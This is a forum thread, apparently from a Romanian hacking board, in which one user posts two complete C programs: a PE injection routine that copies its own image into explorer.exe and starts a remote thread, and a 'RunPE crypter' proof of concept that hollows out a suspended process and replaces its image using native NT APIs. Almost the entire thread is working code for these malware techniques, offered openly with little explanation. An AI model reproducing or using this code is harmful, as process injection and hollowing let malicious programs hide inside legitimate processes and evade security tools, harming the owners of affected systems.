Jump to content
Nytro

[C] Full PE Injection

By Nytro, in Programare

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

C] Full PE Injection

#include <windows.h>
#include <tlhelp32.h>

DWORD GetProcessIdByName(LPWSTR name)
{
    PROCESSENTRY32 pe32;
    HANDLE snapshot = NULL;
    DWORD pid = 0;

    snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot != INVALID_HANDLE_VALUE) {
        pe32.dwSize = sizeof(PROCESSENTRY32);

        if (Process32First(snapshot, &pe32)) {
            do {
                if (!lstrcmp(pe32.szExeFile, name)) {
        pid = pe32.th32ProcessID;
        break;
                }
            } while (Process32Next(snapshot, &pe32));
        }

        CloseHandle(snapshot);
    }

    return pid;
}

LPVOID CopyModule(HANDLE proc, LPVOID image)
{
    PIMAGE_NT_HEADERS headers = (PIMAGE_NT_HEADERS)((LPBYTE)image + ((PIMAGE_DOS_HEADER)image)->e_lfanew);
    PIMAGE_DATA_DIRECTORY datadir;
    DWORD size = headers->OptionalHeader.SizeOfImage;
    LPVOID mem = NULL;
    LPBYTE buf = NULL;
    BOOL ok = FALSE;

    if (headers->Signature != IMAGE_NT_SIGNATURE)
        return NULL;

    if (IsBadReadPtr(image, size))
        return NULL;

    mem = VirtualAllocEx(proc, NULL, size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    if (mem != NULL) {
        buf = (LPBYTE)VirtualAlloc(NULL, size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

        if (buf != NULL) {
            RtlCopyMemory(buf, image, size);

            datadir = &headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];

            if (datadir->Size > 0 && datadir->VirtualAddress > 0) {
                DWORD_PTR delta = (DWORD_PTR)((LPBYTE)mem - headers->OptionalHeader.ImageBase);
                DWORD_PTR olddelta = (DWORD_PTR)((LPBYTE)image - headers->OptionalHeader.ImageBase);
                PIMAGE_BASE_RELOCATION reloc = (PIMAGE_BASE_RELOCATION)(buf + datadir->VirtualAddress);

                while(reloc->VirtualAddress != 0) {
        if (reloc->SizeOfBlock >= sizeof(IMAGE_BASE_RELOCATION)) {
        DWORD count = (reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);
        LPWORD list = (LPWORD)((LPBYTE)reloc + sizeof(IMAGE_BASE_RELOCATION));
        DWORD i;

        for (i = 0; i < count; i++) {
        if (list[i] > 0) {
        DWORD_PTR *p = (DWORD_PTR *)(buf + (reloc->VirtualAddress + (0x0FFF & (list[i]))));

        *p -= olddelta;
        *p += delta;
        }
        }
        }

        reloc = (PIMAGE_BASE_RELOCATION)((LPBYTE)reloc + reloc->SizeOfBlock);
                }

                ok = WriteProcessMemory(proc, mem, buf, size, NULL);
            }

            VirtualFree(buf, 0, MEM_RELEASE); // release buf
        }

        if (!ok) {
            VirtualFreeEx(proc, mem, 0, MEM_RELEASE);
            mem = NULL;
        }
    }

    return mem;
}

BOOL EnableDebugPrivileges(void)
{
    HANDLE token;
    TOKEN_PRIVILEGES priv;
    BOOL ret = FALSE;

    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token)) {
        priv.PrivilegeCount = 1;
        priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

        if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid) != FALSE &&
            AdjustTokenPrivileges(token, FALSE, &priv, 0, NULL, NULL) != FALSE) {
                ret = TRUE;
        }

        CloseHandle(token);
    }

    return ret;
}

BOOL BeginInject(DWORD pid, LPTHREAD_START_ROUTINE start)
{
    HANDLE proc, thread;
    HMODULE module, newmodule;
    BOOL ok = FALSE;

    proc = OpenProcess(PROCESS_QUERY_INFORMATION |
           PROCESS_VM_OPERATION |
           PROCESS_VM_WRITE |
          PROCESS_VM_READ |
          PROCESS_CREATE_THREAD |
          PROCESS_DUP_HANDLE,
          FALSE, pid);

    if (proc != NULL) {
        module = GetModuleHandle(NULL);

        newmodule = (HMODULE)CopyModule(proc, module);

        if (newmodule != NULL) {
            LPTHREAD_START_ROUTINE entry = (LPTHREAD_START_ROUTINE)((LPBYTE)newmodule + (DWORD_PTR)((LPBYTE)start - (LPBYTE)module));

            thread = CreateRemoteThread(proc, NULL, 0, entry, NULL, 0, NULL);

            if (thread != NULL) {
                CloseHandle(thread);
                ok = TRUE;
            }
            else {
                VirtualFreeEx(proc, module, 0, MEM_RELEASE);
            }
        }

        CloseHandle(proc);
    }

    return ok;
}

DWORD WINAPI ThreadProc(LPVOID param)
{
    MessageBox(NULL, L"well look at that :O", NULL, 0);

    return 0;
}

int wmain(void)
{
    // EnableDebugPrivileges(); attempt to aquire debugging privileges
    BeginInject(GetProcessIdByName(L"explorer.exe"), ThreadProc);

    return 0;
}

Sursa: [C] full PE injection

Nytro Mentor

Nytro

Posted
  • Author
Posted

PoC RunPE Crypter - G36KV

#include "WinApi.h"


/***********************************
      PoC RunPE Crypter - G36KV
 ***********************************/

#pragma comment(linker,"/ENTRY:WinMain")

void GetApiList();
BOOL RunPe(const WCHAR * targetFilePath, DWORD_PTR pFileMemory);
PIMAGE_NT_HEADERS CheckHeader(const WCHAR * targetFilePath, DWORD_PTR pFileMemory);

def_CreateProcessInternalW _CreateProcessInternalW = 0;
def_NtGetContextThread _NtGetContextThread = 0;
def_NtSetContextThread _NtSetContextThread = 0;
def_NtReadVirtualMemory _NtReadVirtualMemory = 0;
def_NtUnmapViewOfSection _NtUnmapViewOfSection = 0;
def_NtAllocateVirtualMemory _NtAllocateVirtualMemory = 0;
def_NtWriteVirtualMemory _NtWriteVirtualMemory = 0;
def_NtResumeThread _NtResumeThread = 0;
def_NtTerminateProcess _NtTerminateProcess = 0;

LPVOID _VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);

int CALLBACK WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
    GetApiList();
    return RunPe(L"C:\\target.exe", (DWORD_PTR)1);
}

BOOL RunPe(const WCHAR * targetFilePath, DWORD_PTR pFileMemory)
{
    PIMAGE_NT_HEADERS pNtHeader = 0;
    PIMAGE_SECTION_HEADER pSecHeader = 0;
    PROCESS_INFORMATION pi = {0};
    STARTUPINFO si = {0};
    CONTEXT ctx = {0};
    DWORD_PTR dwImagebase = 0;
    LPVOID pImagebase = 0;
    ULONG NumberOfBytes = 0;
    DWORD_PTR pPebImageBase = 0;
    ULONG SuspendCount = 0;
    WORD counter;

    pNtHeader = CheckHeader(targetFilePath,pFileMemory);

    if (!pNtHeader)
        return FALSE;

    ctx.ContextFlags = CONTEXT_INTEGER;

    if(_CreateProcessInternalW(0,targetFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi,0))
    {
        if (NT_SUCCESS(_NtGetContextThread(pi.hThread, &ctx)))
        {
#ifdef _WIN64
            pPebImageBase = ctx.Rdx + (sizeof(DWORD_PTR) * 2);
#else
            pPebImageBase = ctx.Ebx + (sizeof(DWORD_PTR) * 2);
#endif

            if (NT_SUCCESS(_NtReadVirtualMemory(pi.hProcess, (PVOID)pPebImageBase, &dwImagebase, sizeof(DWORD_PTR),&NumberOfBytes)))
            {
                if (NT_SUCCESS(_NtUnmapViewOfSection(pi.hProcess, (PVOID)dwImagebase)))
                {
                    pImagebase = _VirtualAllocEx(pi.hProcess, (PVOID)pNtHeader->OptionalHeader.ImageBase, pNtHeader->OptionalHeader.SizeOfImage, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);

                    if (pImagebase)
                    {
                        if (NT_SUCCESS(_NtWriteVirtualMemory(pi.hProcess,pImagebase,(LPVOID)pFileMemory,pNtHeader->OptionalHeader.SizeOfHeaders,&NumberOfBytes)))
                        {
                            pSecHeader = IMAGE_FIRST_SECTION(pNtHeader);

                            for (counter = 0; counter < pNtHeader->FileHeader.NumberOfSections; counter++)
                            {
                                _NtWriteVirtualMemory(pi.hProcess,(LPVOID)((DWORD_PTR)pImagebase + pSecHeader->VirtualAddress), (LPVOID)(pFileMemory + pSecHeader->PointerToRawData),pSecHeader->SizeOfRawData, &NumberOfBytes);
                                pSecHeader++;
                            }

                            if (NT_SUCCESS(_NtWriteVirtualMemory(pi.hProcess,(PVOID)pPebImageBase,&(pNtHeader->OptionalHeader.ImageBase),sizeof(DWORD_PTR),&NumberOfBytes)))
                            {
#ifdef _WIN64
                                ctx.Rcx = (DWORD_PTR)pImagebase + pNtHeader->OptionalHeader.AddressOfEntryPoint;
#else
                                ctx.Eax = (DWORD_PTR)pImagebase + pNtHeader->OptionalHeader.AddressOfEntryPoint;
#endif
                                if (NT_SUCCESS(_NtSetContextThread(pi.hThread, &ctx)))
                                {
                                    if (NT_SUCCESS(_NtResumeThread(pi.hThread, &SuspendCount)))
                                    {
                                        return TRUE;
                                    }
                                }

                            }
                        }
                    }
                }
            }
        }

        _NtTerminateProcess(pi.hProcess, 0);
    }


    return FALSE;
}

PIMAGE_NT_HEADERS CheckHeader(const WCHAR * targetFilePath, DWORD_PTR pFileMemory)
{
    PIMAGE_DOS_HEADER pDosHeader = 0;
    PIMAGE_NT_HEADERS pNtHeader = 0;

    if (targetFilePath)
    {
        if (pFileMemory)
        {
            pDosHeader = (PIMAGE_DOS_HEADER)pFileMemory;
            if (pDosHeader->e_magic == IMAGE_DOS_SIGNATURE)
            {
                pNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)pFileMemory + pDosHeader->e_lfanew);
                if (pNtHeader->Signature == IMAGE_NT_SIGNATURE)
                {
                    return pNtHeader;
                }
            }
        }
    }

    return 0;
}

LPVOID _VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
{
    SIZE_T RegionSize = dwSize;
    PVOID BaseAddress = lpAddress;

    if (NT_SUCCESS(_NtAllocateVirtualMemory(hProcess, &BaseAddress, 0x00, &RegionSize, flAllocationType, flProtect)))
    {
        return BaseAddress;
    }
    else
    {
        return 0;
    }
}

void GetApiList()
{
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    HMODULE hKernel = GetModuleHandleA("kernel32.dll");

    if (!hKernel || !hNtdll)
        return;

    _CreateProcessInternalW = (def_CreateProcessInternalW)GetProcAddress(hKernel,"CreateProcessInternalW");
    _NtGetContextThread = (def_NtGetContextThread)GetProcAddress(hNtdll,"NtGetContextThread");
    _NtSetContextThread = (def_NtSetContextThread)GetProcAddress(hNtdll,"NtSetContextThread");
    _NtReadVirtualMemory = (def_NtReadVirtualMemory)GetProcAddress(hNtdll,"NtReadVirtualMemory");
    _NtUnmapViewOfSection = (def_NtUnmapViewOfSection)GetProcAddress(hNtdll,"NtUnmapViewOfSection");
    _NtAllocateVirtualMemory = (def_NtAllocateVirtualMemory)GetProcAddress(hNtdll,"NtAllocateVirtualMemory");
    _NtWriteVirtualMemory = (def_NtWriteVirtualMemory)GetProcAddress(hNtdll,"NtWriteVirtualMemory");
    _NtResumeThread = (def_NtResumeThread)GetProcAddress(hNtdll,"NtResumeThread");
    _NtTerminateProcess = (def_NtTerminateProcess)GetProcAddress(hNtdll,"NtTerminateProcess");

}

Sursa: http://www.hackhound.org/forum/index.php/topic/42925-runpe-with-native-api-x64x86/

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...